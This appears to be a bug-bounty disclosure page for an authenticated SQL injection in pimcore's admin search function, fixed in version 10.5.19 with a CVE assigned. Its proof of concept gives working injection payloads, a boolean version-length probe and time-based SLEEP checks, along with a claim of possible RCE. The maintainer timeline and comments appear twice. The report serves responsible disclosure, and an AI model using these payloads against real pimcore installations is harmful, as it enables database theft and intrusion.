SQL injection search function in pimcore/pimcore

Valid

Reported on

Feb 24th 2023

Description

Please enter a description of the vulnerability.

Link POC: https://drive.google.com/drive/folders/1oFZPVrJ7lID7tDArO8spsMy1VYr_4oOb?usp=sharing

Proof of Concept

Step 1: login https://demo.pimcore.fun/admin/ Step 2: user search function and intercept request with burp Step 3: Exploit time Payload to get the length banner of DB

/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+length(@@version))=39+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1

Payload Check time base

time sleep 5

/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(5)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1

time sleep 0

/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(0)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1

FUZZ with sqlmap

Impact

Attacker can get full DB and maybe RCE knowing the WEBROOT path. In this case I know WEBROOT so I can RCE through the article (https://viblo.asia/p/efiens-ctf-2019-write-up-tu-sql-injection-toi-rce-va-get- root-oOVlYom4K8W)

We are processing your report and will contact the pimcore team within 24 hours. 3 months ago

We have contacted a member of the pimcore team and are waiting to hear back 3 months ago

A pimcore/pimcore maintainer has acknowledged this report 3 months ago

com0t

commented 3 months ago

Researcher

hi, any update?

com0t

commented 2 months ago

Researcher

hi, any update?

Divesh Pahuja modified the Severity from Critical (9.1) to Medium (6.7) 2 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Divesh Pahuja validated this vulnerability 2 months ago

Updated the severity to Medium as you still needs to be authenticated to call this action and limited the users with permissions to the admin.

com0t has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Divesh Pahuja marked this as fixed in 10.5.19 with commit 367b74 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

Divesh Pahuja published this vulnerability 2 months ago

com0t

commented 2 months ago

Researcher

Hi, I need you to clarify where admin rights are needed to exploit. The system can decentralize users, so I think only users with search permission can exploit this vulnerability.

to join this conversation

We are processing your report and will contact the pimcore team within 24 hours. 3 months ago

We have contacted a member of the pimcore team and are waiting to hear back 3 months ago

A pimcore/pimcore maintainer has acknowledged this report 3 months ago

com0t

commented 3 months ago

Researcher

hi, any update?

com0t

commented 2 months ago

Researcher

hi, any update?

Divesh Pahuja modified the Severity from Critical (9.1) to Medium (6.7) 2 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Divesh Pahuja validated this vulnerability 2 months ago

Updated the severity to Medium as you still needs to be authenticated to call this action and limited the users with permissions to the admin.

com0t has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Divesh Pahuja marked this as fixed in 10.5.19 with commit 367b74 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

Divesh Pahuja published this vulnerability 2 months ago

com0t

commented 2 months ago

Researcher

Hi, I need you to clarify where admin rights are needed to exploit. The system can decentralize users, so I think only users with search permission can exploit this vulnerability.

to join this conversation